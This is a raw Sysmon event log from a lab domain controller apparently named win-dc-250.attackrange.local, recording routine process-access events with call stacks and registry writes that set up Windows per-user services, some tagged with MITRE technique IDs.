13:29:55.545{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}8442520C:\Windows\system32\services.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+1cf77|C:\Windows\system32\services.exe+2dc8|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 13241300x80000000000000009877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\Description@%%SystemRoot%%\system32\WpnUserService.dll,-2 13241300x80000000000000009876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\FailureActionsBinary Data 13241300x80000000000000009875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\Security\SecurityBinary Data 13241300x80000000000000009874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\DisplayNameWindows Push Notifications User Service_2dc041 13241300x80000000000000009873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\ErrorControlDWORD (0x00000000) 13241300x80000000000000009871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\StartDWORD (0x00000003) 13241300x80000000000000009870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2dc041\TypeDWORD (0x000000e0) 13241300x80000000000000009869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-14000 13241300x80000000000000009868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\FailureActionsBinary Data 13241300x80000000000000009867Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\Security\SecurityBinary Data 13241300x80000000000000009866Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\DisplayNameUser Data Access_2dc041 13241300x80000000000000009865Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009864Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\ErrorControlDWORD (0x00000000) 13241300x80000000000000009863Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\StartDWORD (0x00000003) 13241300x80000000000000009862Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2dc041\TypeDWORD (0x000000e0) 13241300x80000000000000009861Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-10002 13241300x80000000000000009860Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\FailureActionsBinary Data 13241300x80000000000000009859Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.545{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\Security\SecurityBinary Data 13241300x80000000000000009858Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\DisplayNameUser Data Storage_2dc041 13241300x80000000000000009857Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\ImagePathC:\Windows\System32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009856Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\ErrorControlDWORD (0x00000000) 13241300x80000000000000009855Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\StartDWORD (0x00000003) 13241300x80000000000000009854Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2dc041\TypeDWORD (0x000000e0) 13241300x80000000000000009853Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\Description@%%SystemRoot%%\system32\UserDataAccessRes.dll,-15000 13241300x80000000000000009852Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\FailureActionsBinary Data 13241300x80000000000000009851Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\Security\SecurityBinary Data 13241300x80000000000000009850Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\DisplayNameContact Data_2dc041 13241300x80000000000000009849Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009848Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\ErrorControlDWORD (0x00000000) 13241300x80000000000000009847Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\StartDWORD (0x00000003) 13241300x80000000000000009846Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2dc041\TypeDWORD (0x000000e0) 13241300x80000000000000009845Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\Description@%%SystemRoot%%\system32\APHostRes.dll,-10001 13241300x80000000000000009844Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\FailureActionsBinary Data 13241300x80000000000000009843Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\Security\SecurityBinary Data 13241300x80000000000000009842Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\DisplayNameSync Host_2dc041 13241300x80000000000000009841Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009840Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\ErrorControlDWORD (0x00000000) 13241300x80000000000000009839Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\StartDWORD (0x00000002) 13241300x80000000000000009838Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2dc041\TypeDWORD (0x000000e0) 13241300x80000000000000009837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\Description@%%SystemRoot%%\system32\cdpusersvc.dll,-101 13241300x80000000000000009836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\FailureActionsBinary Data 13241300x80000000000000009835Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\Security\SecurityBinary Data 13241300x80000000000000009834Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\DisplayNameCDPUserSvc_2dc041 13241300x80000000000000009833Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\ImagePathC:\Windows\system32\svchost.exe -k UnistackSvcGroup 13241300x80000000000000009832Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\ErrorControlDWORD (0x00000001) 13241300x80000000000000009831Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localT1031,T1050SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\StartDWORD (0x00000002) 13241300x80000000000000009830Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:55.529{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2dc041\TypeDWORD (0x000000e0) 10341000x80000000000000009829Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.529{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009828Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.529{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.529{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.482{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.467{08A6967A-4753-6000-0D05-000000009A01}11164772C:\Windows\System32\RuntimeBroker.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x80000000000000009824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.467{08A6967A-4753-6000-0D05-000000009A01}11164772C:\Windows\System32\RuntimeBroker.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x80000000000000009823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 